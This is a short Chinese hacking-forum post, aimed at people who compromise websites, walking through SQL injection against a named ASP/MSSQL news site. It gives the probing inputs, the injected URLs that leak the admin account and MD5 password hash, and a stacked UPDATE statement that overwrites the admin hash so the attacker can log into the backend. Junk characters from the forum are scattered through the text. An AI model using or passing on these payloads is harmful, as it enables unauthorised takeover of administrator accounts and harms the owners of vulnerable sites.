经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
. D9 \* y, R# x. P/ u可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)( q4 Y) O. [. j& o/ X0 Q7 `
测试如下:3 E) Q, a, {! q: w
http://www.tmdsb.com/news.asp?id=121
; s5 L1 ]* V+ {: \' P在地址后输入单引号,显示
. ?/ E/ D! T. q, |+ D7 Q( OMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
0 U* v/ x2 w+ | Q! `字符串 ’’’ 之前有未闭合的引号
6 R0 s1 `2 \7 U9 K3 R8 |" `/news/tmdws.asp,行63% p+ J: G% V. H5 P1 z
说明没有过滤单引号且数据库是MSSQL.1 J4 |4 w2 g3 Q) V
and 1=1正常。and 1=2出错。肯定存在注入& ~6 c `9 Y, P7 r9 W/ o' k
接着输入
9 E0 d: j9 P; r( K3 o. Hhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
1 C) {8 V/ e1 v0 ]6 R( ?+ l0 J得到帐号为:admin8 Q: j4 h+ ]1 |, o6 D
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
. K7 B; p) g" Z! H得到密码为:a4716077c2ba075c
( B% z. l* I3 N9 ]) m2 V接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433: X( O3 }: ?& M9 y
命令如下 :
7 f. M1 V7 X0 C: F6 \;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
5 U5 d; n0 Y0 a5 n这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41